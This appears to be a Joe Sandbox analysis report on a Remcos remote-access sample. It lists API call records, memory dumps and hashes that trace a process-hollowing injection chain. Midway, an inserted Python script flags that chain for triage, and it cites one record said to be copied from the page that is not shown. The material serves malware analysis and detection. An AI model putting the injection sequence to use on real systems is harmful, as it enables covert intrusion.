                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 804d9f93a245d099ae654ca79e4f9f2a0a59d2c46b0bcc8a1470f599c58027c0
                                              • Instruction ID: 36be4edd6f9315f22f19b5a0b4d2d368a89362db6a84eae5812f0c11ecb81b16
                                              • Opcode Fuzzy Hash: 804d9f93a245d099ae654ca79e4f9f2a0a59d2c46b0bcc8a1470f599c58027c0
                                              • Instruction Fuzzy Hash: D8216AB69003098FDB14DFAAC4857EEBBF5EF48354F14842AD859A7240D7789944CFA0

                                              Control-flow Graph (figure): entry 07767921, blocks 07767921-077679EE; ReadProcessMemory called in entry block 07767921-077679B5
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 077679A8
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: a6d9f71ebe588e5dee8dadf16bcd53d7e5cfefcbc631fba856035ce5b16aef3c
                                              • Instruction ID: c4a5b74f40611a88c72d4ad40d836ec7505f62a0aefabc08f228d59ecb46a0a1
                                              • Opcode Fuzzy Hash: a6d9f71ebe588e5dee8dadf16bcd53d7e5cfefcbc631fba856035ce5b16aef3c
                                              • Instruction Fuzzy Hash: CE2148B18003599FDB10CFAAC884BEEBBF5FF48310F10842AE958A7240D7799944CBA1

                                              Control-flow Graph (figure): entry 0141D5E8, blocks 0141D5E8-0141D6AA; DuplicateHandle called in entry block 0141D5E8-0141D684
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0141D677
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1527291538.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_1410000_remcos.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: a2b919bd3582e771cd6f9c3c581c13029c18a91c8d61b9bf5cae38e8a1bd991f
                                              • Instruction ID: fadfa764b218a7a252ae95d3a28bc6ca82eaf6bf875cebfefe0778767f08099f
                                              • Opcode Fuzzy Hash: a2b919bd3582e771cd6f9c3c581c13029c18a91c8d61b9bf5cae38e8a1bd991f
                                              • Instruction Fuzzy Hash: 482112B5C002499FDB10CFAAD584BEEBBF4EB08310F14842AE958A3350C378A954CF61

                                              Control-flow Graph (figure): entry 077676A0, blocks 077676A0-07767764; Wow64SetThreadContext called in block 077676FB-0776772B
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0776771E
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: cd2151abc3a30ee4d346c79e4b0c2ab962c8cc2aaa50db47d9929fcbf4b6c289
                                              • Instruction ID: 9da922077b48d237790422298b287d298b61bf4c4234148812bd1f9b6584443a
                                              • Opcode Fuzzy Hash: cd2151abc3a30ee4d346c79e4b0c2ab962c8cc2aaa50db47d9929fcbf4b6c289
                                              • Instruction Fuzzy Hash: 272147B1D003098FDB14CFAAC4857EEBBF5EF48364F14842AD859A7240C7789944CFA1

                                              Control-flow Graph (figure): entry 07767928, blocks 07767928-077679EE; ReadProcessMemory called in entry block 07767928-077679B5
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 077679A8
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 542b4056b025b035a1cb3c0844af69e806614180b55b1334fd0499e160d8d2bd
                                              • Instruction ID: fd6cf5010779a15f966a25f5556ac994936675db4ee6a6eb69fde9e6180b05ae
                                              • Opcode Fuzzy Hash: 542b4056b025b035a1cb3c0844af69e806614180b55b1334fd0499e160d8d2bd
                                              • Instruction Fuzzy Hash: 602125B18003499FDB10CFAAC884BEEFBF5FF48310F54842AE958A7240D7799944CBA1

                                              Control-flow Graph (figure): entry 0141D5F0, blocks 0141D5F0-0141D6AA; DuplicateHandle called in entry block 0141D5F0-0141D684
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0141D677
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1527291538.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_1410000_remcos.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: a3f177335f8745de23bd4276fa1797192e86e231406ecd25c3ef0bb6f4a9be13
                                              • Instruction ID: f74eeca916dafba0b2a09c0b99e24e0205df56d170528696db170c0fed5825de
                                              • Opcode Fuzzy Hash: a3f177335f8745de23bd4276fa1797192e86e231406ecd25c3ef0bb6f4a9be13
                                              • Instruction Fuzzy Hash: 5421C4B5D002499FDB10CF9AD584ADEFBF5EB48310F14841AE958A3350D378A954CF65
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077677E6
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 327cd2dcd31bc06ffdecbd67f437487a4565d50c25bb545a5cee31f0dc5a057f
                                              • Instruction ID: 1a00593fd4ec2831309d1bd3398c38e51819ca867fe55277b5289326e137f0f7
                                              • Opcode Fuzzy Hash: 327cd2dcd31bc06ffdecbd67f437487a4565d50c25bb545a5cee31f0dc5a057f
                                              • Instruction Fuzzy Hash: 031156B68002099FDB14DFAAC844BDFBBF9EF48314F248819E919A7250C7799944CFA0
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077677E6
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 966fd98f5489e188c47fe00b0b49bf6f1c19103edd62d5bf5e39438d071f5dfb
                                              • Instruction ID: ab61f3abf9a3e811967626cbc1c3280a6a4be238bc080e0211e1b6cfde944815
                                              • Opcode Fuzzy Hash: 966fd98f5489e188c47fe00b0b49bf6f1c19103edd62d5bf5e39438d071f5dfb
                                              • Instruction Fuzzy Hash: FC1137768003499FDB10DFAAC844BDEBBF5EF48310F148819E559A7250C7799544CFA1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: a38741cb955c08c7b98ff878d0a5b6e7af3b987603897483f356796c0aefbe51
                                              • Instruction ID: d0673dc6d3027395a6bacdf37dbe109d294c63b6c1ce6b3215ffbdc1bd59594b
                                              • Opcode Fuzzy Hash: a38741cb955c08c7b98ff878d0a5b6e7af3b987603897483f356796c0aefbe51
                                              • Instruction Fuzzy Hash: CC118BB19003098FDB14DFAAC8447DEFBF5EB88364F24882AD459A7240C7796544CFA4
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: b5f6c9106a022fe7ceeb0b5de6a08487272fa36be344a7a5104ea379ee032603
                                              • Instruction ID: eac37355204c0a471f2bf8e6fe6444790633887c8fcb6e2e7117922a5f8567f9
                                              • Opcode Fuzzy Hash: b5f6c9106a022fe7ceeb0b5de6a08487272fa36be344a7a5104ea379ee032603
                                              • Instruction Fuzzy Hash: 431158B18003498FDB20DFAAC4447DEFBF5EB48224F148829D519A7240C7796544CFA4
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0776B48D
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 0424bdf667c613e4b202b08e9867cc6a83df16fb9dd06a5e77895f41b8c4b017
                                              • Instruction ID: a67337e6c5e0b9353b3574a08708cb6385c492a068ec208d3b375e1b72a62c9a
                                              • Opcode Fuzzy Hash: 0424bdf667c613e4b202b08e9867cc6a83df16fb9dd06a5e77895f41b8c4b017
                                              • Instruction Fuzzy Hash: E911F5B58007499FDB10DF9AC448BDEBFF8EB49310F208819E954A7350D375A944CFA1
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0141AF5E
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1527291538.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_1410000_remcos.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 4c63dcbb8be704a1870d82670ccdb42542271351c112711a682ca608b1b4fcea
                                              • Instruction ID: 609b232ccb9a31f1e428271bd7ef9b498191ef364d523861ad85a5367767c0b1
                                              • Opcode Fuzzy Hash: 4c63dcbb8be704a1870d82670ccdb42542271351c112711a682ca608b1b4fcea
                                              • Instruction Fuzzy Hash: A01110B5C006498FDB10CF9AC444BDEFBF4EB88324F20842AD428A7354C379A545CFA1
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0776B48D
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_7760000_remcos.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 12d06794857981924603548e1f6aa76c1da01dc8bf1a6cee77a9c020fc0c5693
                                              • Instruction ID: 1ddae272604c6e90ecede229be9264fe01628462c8dd86c6651a2cf32a75b689
                                              • Opcode Fuzzy Hash: 12d06794857981924603548e1f6aa76c1da01dc8bf1a6cee77a9c020fc0c5693
                                              • Instruction Fuzzy Hash: 7A11D0B98002499FDB10CF99D589BDEBBF8EB48320F20881AD958A7650D379A544CFA1
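The records for the 07760000 dump region above (VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext, ReadProcessMemory, ResumeThread) together form the process-hollowing chain behind the report's "Injects a PE file into a foreign processes" signature. The following script is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses function records in the textual form shown on this page, groups the Win32 calls by memory-dump region, and flags a region whose functions cover all four hollowing stages. The stage table, the four-stage threshold, the inclusion of the native SetThreadContext and of SendMessageW (generalising beyond what this page shows), and the reading of the PostMessageW message argument 00000010 as WM_CLOSE are this example's own assumptions; the sample input is constructed from six of the records above with the other report fields left out.

```python
"""Triage helper for the per-function records above (added example, not Joe Sandbox code)."""
import re
from collections import defaultdict

# Constructed sample input: fields copied from six records on this page
# (process 15, regions 07760000 and 01410000); other report fields omitted.
SAMPLE_REPORT = """\
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077677E6
• Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
• Opcode ID: 327cd2dcd31bc06ffdecbd67f437487a4565d50c25bb545a5cee31f0dc5a057f
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077678C8
• Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
• Opcode ID: bbe0200bae26ef9d133a816e7864056189eb265fd92bbef4402f86c7982f9596
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0776771E
• Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
• Opcode ID: 804d9f93a245d099ae654ca79e4f9f2a0a59d2c46b0bcc8a1470f599c58027c0
• Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
• API ID: ResumeThread
• Opcode ID: a38741cb955c08c7b98ff878d0a5b6e7af3b987603897483f356796c0aefbe51
• PostMessageW.USER32(?,00000010,00000000,?), ref: 0776B48D
• Source File: 0000000F.00000002.1544181960.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
• Opcode ID: 0424bdf667c613e4b202b08e9867cc6a83df16fb9dd06a5e77895f41b8c4b017
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0141D677
• Source File: 0000000F.00000002.1527291538.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
• Opcode ID: a2b919bd3582e771cd6f9c3c581c13029c18a91c8d61b9bf5cae38e8a1bd991f
"""

CALL_RE = re.compile(r"•\s*(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")
APIID_RE = re.compile(r"•\s*API ID:\s*(\S*)")
OPCODE_RE = re.compile(r"•\s*Opcode ID:\s*([0-9a-f]{64})")

# Assumed stage mapping; the page shows the WoW64 variant, SetThreadContext
# is its native 64-bit counterpart.
HOLLOWING_STAGES = {
    "allocate": {"VirtualAllocEx"},
    "write": {"WriteProcessMemory"},
    "hijack": {"Wow64SetThreadContext", "SetThreadContext"},
    "resume": {"ResumeThread"},
}
KNOWN_APIS = set().union(*HOLLOWING_STAGES.values())
WM_CLOSE = 0x0010  # the Msg value 00000010 in the PostMessageW record above


def parse_records(text):
    """One record per Opcode ID line, carrying its calls, dump offset and API ID."""
    records, cur = [], {"calls": []}
    for line in text.splitlines():
        if m := CALL_RE.search(line):
            cur["calls"].append({"api": m[1], "module": m[2],
                                 "args": [a.strip() for a in m[3].split(",")],
                                 "ref": int(m[4], 16)})
        elif m := OFFSET_RE.search(line):
            cur["offset"] = int(m[1], 16)
        elif m := APIID_RE.search(line):
            cur["api_id"] = m[1]
        elif m := OPCODE_RE.search(line):
            cur["opcode_id"] = m[1]
            records.append(cur)
            cur = {"calls": []}
    return records


def apis_in(record):
    """API names a record evidences. Records without a call line (ResumeThread
    above) only carry Joe's normalised "API ID"; trust it solely when it is
    literally one of the API names being looked for."""
    names = {c["api"] for c in record["calls"]}
    if not names and record.get("api_id") in KNOWN_APIS:
        names.add(record["api_id"])
    return names


def flag_regions(records, min_stages=4):
    """Dump regions whose functions together cover >= min_stages hollowing
    stages (threshold assumed), keyed by dump offset."""
    regions = defaultdict(set)
    for r in records:
        regions[r.get("offset")] |= apis_in(r)
    flagged = {}
    for off, apis in regions.items():
        stages = sorted(s for s, names in HOLLOWING_STAGES.items() if names & apis)
        if len(stages) >= min_stages:
            flagged[hex(off)] = stages
    return flagged


def window_close_refs(records):
    """Call sites that post or send WM_CLOSE (Msg argument 0x10) to a window."""
    msg_apis = {"PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA"}
    return [c["ref"] for r in records for c in r["calls"]
            if c["api"] in msg_apis and len(c["args"]) > 1
            and c["args"][1] != "?" and int(c["args"][1], 16) == WM_CLOSE]


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    print(flag_regions(recs))  # {'0x7760000': ['allocate', 'hijack', 'resume', 'write']}
    print([hex(ref) for ref in window_close_refs(recs)])  # ['0x776b48d']
```

Run stand-alone it reports the 07760000 region as covering all four stages while the 01410000 region (DuplicateHandle only) stays unflagged; to triage a whole report, paste the full disassembly section into parse_records. Grouping by dump offset matters because Joe records each API in a separate function, so no single record shows the chain.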
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1520359236.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_100d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1c218a001e9167f51b608c12a15fba9a7e1e7ea00354149e8a1ecdb469e48a91
                                              • Instruction ID: 002d1f274ce87b41b33b5a4ed05b92ae73b547ba9a43c05409a1ffc1a0a2dd63
                                              • Opcode Fuzzy Hash: 1c218a001e9167f51b608c12a15fba9a7e1e7ea00354149e8a1ecdb469e48a91
                                              • Instruction Fuzzy Hash: F0214871500304DFEB02DF84C9C0B6ABBA5FB84324F24C1A9E9490B286C736E446CBB2
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1520846034.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_101d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: df2a61f14fc635e1cf1482f31bf529fc896b82dd00d4d179eebc30d17c49f686
                                              • Instruction ID: 954bc64ffb9928bb2dcba67005f7cb69c760feb9abb8d507ffc4b4b373073073
                                              • Opcode Fuzzy Hash: df2a61f14fc635e1cf1482f31bf529fc896b82dd00d4d179eebc30d17c49f686
                                              • Instruction Fuzzy Hash: 96214971504340EFDB01DF94D5C4B69BBA5FB94324F24C6ADE8894B28AC33AD406CB61
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1520846034.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_101d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f30196f4bb3b4dde9b7ded88eaf6343b1d63ce49633a9627308e457c4296d429
                                              • Instruction ID: 4612a2dd6c5bafa73f46026dc99048ca46a45a6d799cb44d2f441aa5b6ee13a7
                                              • Opcode Fuzzy Hash: f30196f4bb3b4dde9b7ded88eaf6343b1d63ce49633a9627308e457c4296d429
                                              • Instruction Fuzzy Hash: B3212575504340DFDB16DF94D8C8B16BBA5FB84314F24C5ADE88A4B28AC33AD447CB62
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1520359236.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_100d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction ID: 0d075a3d039a5012cbe7643377a640407535f3073ac79d9eb55b8cfbc45f5883
                                              • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction Fuzzy Hash: 7F11DF72404240CFDB02CF84D5C0B56BFB1FB84324F24C2AAD8490B697C33AE456CBA2
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1520846034.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_101d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction ID: 3094a24bcad1ac7375b10ec728941a7705934b2af73d4ee0b19ada7a321a17af
                                              • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction Fuzzy Hash: 57118E75504280DFDB16CF54D5C4B15BBA2FB44314F24C6AAE8494B69AC33AD44ACB62
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1520846034.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_101d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction ID: 52c4e030545ed9c2980995f2eeb44f1d2fc811d1d3b6b6c44bbe094fd1f51d8d
                                              • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction Fuzzy Hash: A611BB75504280DFCB02CF54C5C4B55BBA1FB84224F28C6AAD8894B69AC33AD44ACB61
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1520359236.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_100d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 78b67a22e2e3f56063e27da83039ff5a3932d2435c1fe9a7eee179a38a193fd6
                                              • Instruction ID: 84e8c6cb4c85c297fbe05036090fcce1542063ce62e942f5e141758e71769914
                                              • Opcode Fuzzy Hash: 78b67a22e2e3f56063e27da83039ff5a3932d2435c1fe9a7eee179a38a193fd6
                                              • Instruction Fuzzy Hash: 6B01A7311047809FF7524AD5CD84B6AFFD8EF41224F18845AED4D4A2C6E7799440CBB2
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.1520359236.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_15_2_100d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b05aa9d8bf42f2f9852c1c6a2d1393c19352dbebe463eb990d459bc1c21a2601
                                              • Instruction ID: 95fa11d96b3bdd8e5fd8b5e5628015119ae87ff05a989bed8da1c10a3541be31
                                              • Opcode Fuzzy Hash: b05aa9d8bf42f2f9852c1c6a2d1393c19352dbebe463eb990d459bc1c21a2601
                                              • Instruction Fuzzy Hash: 59F0AF310043809EE7118A4AC984B62FFE8EB40634F18C49AED484A2C6D3799844CBB1

                                              Execution Graph

                                              Execution Coverage:10.3%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:167
                                              Total number of Limit Nodes:8
                                              execution_graph 23859 15a4668 23860 15a4672 23859->23860 23862 15a4758 23859->23862 23863 15a477d 23862->23863 23867 15a4858 23863->23867 23871 15a4868 23863->23871 23869 15a4868 23867->23869 23868 15a496c 23868->23868 23869->23868 23875 15a44b4 23869->23875 23873 15a488f 23871->23873 23872 15a496c 23873->23872 23874 15a44b4 CreateActCtxA 23873->23874 23874->23872 23876 15a58f8 CreateActCtxA 23875->23876 23878 15a59bb 23876->23878 23878->23878 23879 74caeb8 23880 74caede 23879->23880 23881 74cb043 23879->23881 23880->23881 23883 74c4460 23880->23883 23884 74cb138 PostMessageW 23883->23884 23885 74cb1a4 23884->23885 23885->23880 23886 74c8079 23887 74c7edc 23886->23887 23888 74c815b 23887->23888 23889 74c9c9e 12 API calls 23887->23889 23890 74c9c28 12 API calls 23887->23890 23891 74c9c38 12 API calls 23887->23891 23889->23888 23890->23888 23891->23888 23685 15ad5f0 DuplicateHandle 23686 15ad686 23685->23686 23687 15aac10 23691 15aad08 23687->23691 23696 15aacf9 23687->23696 23688 15aac1f 23692 15aad3c 23691->23692 23693 15aad19 23691->23693 23692->23688 23693->23692 23694 15aaf40 GetModuleHandleW 23693->23694 23695 15aaf6d 23694->23695 23695->23688 23697 15aad3c 23696->23697 23698 15aad19 23696->23698 23697->23688 23698->23697 23699 15aaf40 GetModuleHandleW 23698->23699 23700 15aaf6d 23699->23700 23700->23688 23892 15acfa0 23893 15acfe6 GetCurrentProcess 23892->23893 23895 15ad038 GetCurrentThread 23893->23895 23896 15ad031 23893->23896 23897 15ad06e 23895->23897 23898 15ad075 GetCurrentProcess 23895->23898 23896->23895 23897->23898 23900 15ad0ab 23898->23900 23899 15ad0d3 GetCurrentThreadId 23901 15ad104 23899->23901 23900->23899 23701 74c8200 23702 74c8180 23701->23702 23707 74c9c9e 23702->23707 23723 74c9c38 23702->23723 23738 74c9c28 23702->23738 23703 74c82b3 23708 74c9c2c 23707->23708 23710 74c9ca1 23707->23710 23709 74c9c5a 23708->23709 23753 74ca6e6 23708->23753 23758 74ca205 23708->23758 23763 74ca355 
23708->23763 23768 74ca954 23708->23768 23773 74ca454 23708->23773 23777 74ca0f9 23708->23777 23782 74ca159 23708->23782 23787 74ca398 23708->23787 23792 74ca25f 23708->23792 23797 74ca17e 23708->23797 23801 74ca2bd 23708->23801 23806 74ca2dd 23708->23806 23709->23703 23710->23703 23724 74c9c52 23723->23724 23725 74c9c5a 23724->23725 23726 74ca205 2 API calls 23724->23726 23727 74ca6e6 2 API calls 23724->23727 23728 74ca2dd 2 API calls 23724->23728 23729 74ca2bd 2 API calls 23724->23729 23730 74ca17e 2 API calls 23724->23730 23731 74ca25f 2 API calls 23724->23731 23732 74ca398 2 API calls 23724->23732 23733 74ca159 2 API calls 23724->23733 23734 74ca0f9 2 API calls 23724->23734 23735 74ca454 2 API calls 23724->23735 23736 74ca954 2 API calls 23724->23736 23737 74ca355 2 API calls 23724->23737 23725->23703 23726->23725 23727->23725 23728->23725 23729->23725 23730->23725 23731->23725 23732->23725 23733->23725 23734->23725 23735->23725 23736->23725 23737->23725 23739 74c9c2c 23738->23739 23740 74c9c5a 23739->23740 23741 74ca205 2 API calls 23739->23741 23742 74ca6e6 2 API calls 23739->23742 23743 74ca2dd 2 API calls 23739->23743 23744 74ca2bd 2 API calls 23739->23744 23745 74ca17e 2 API calls 23739->23745 23746 74ca25f 2 API calls 23739->23746 23747 74ca398 2 API calls 23739->23747 23748 74ca159 2 API calls 23739->23748 23749 74ca0f9 2 API calls 23739->23749 23750 74ca454 2 API calls 23739->23750 23751 74ca954 2 API calls 23739->23751 23752 74ca355 2 API calls 23739->23752 23740->23703 23741->23740 23742->23740 23743->23740 23744->23740 23745->23740 23746->23740 23747->23740 23748->23740 23749->23740 23750->23740 23751->23740 23752->23740 23754 74ca6ec 23753->23754 23811 74c71b8 23754->23811 23815 74c71b7 23754->23815 23755 74ca737 23755->23709 23760 74ca165 23758->23760 23759 74caa17 23760->23758 23760->23759 23819 74c7838 23760->23819 23823 74c7837 23760->23823 23764 74ca362 23763->23764 23766 74c71b8 ResumeThread 23764->23766 23767 74c71b7 ResumeThread 23764->23767 
23765 74ca737 23765->23709 23766->23765 23767->23765 23769 74caa89 23768->23769 23827 74c769f 23769->23827 23831 74c76a0 23769->23831 23770 74caaa4 23775 74c769f Wow64SetThreadContext 23773->23775 23776 74c76a0 Wow64SetThreadContext 23773->23776 23774 74ca46e 23775->23774 23776->23774 23778 74ca10c 23777->23778 23835 74c7abf 23778->23835 23839 74c7ac0 23778->23839 23783 74ca165 23782->23783 23784 74caa17 23783->23784 23785 74c7838 WriteProcessMemory 23783->23785 23786 74c7837 WriteProcessMemory 23783->23786 23785->23783 23786->23783 23788 74ca2e4 23787->23788 23843 74c7928 23788->23843 23847 74c7921 23788->23847 23789 74ca1e2 23789->23789 23793 74ca322 23792->23793 23851 74c7778 23793->23851 23855 74c7777 23793->23855 23794 74ca340 23799 74c7838 WriteProcessMemory 23797->23799 23800 74c7837 WriteProcessMemory 23797->23800 23798 74ca1ac 23798->23709 23799->23798 23800->23798 23802 74ca2c3 23801->23802 23804 74c7838 WriteProcessMemory 23802->23804 23805 74c7837 WriteProcessMemory 23802->23805 23803 74ca5b7 23804->23803 23805->23803 23807 74ca2e3 23806->23807 23808 74ca1e2 23807->23808 23809 74c7928 ReadProcessMemory 23807->23809 23810 74c7921 ReadProcessMemory 23807->23810 23808->23808 23809->23808 23810->23808 23812 74c71f8 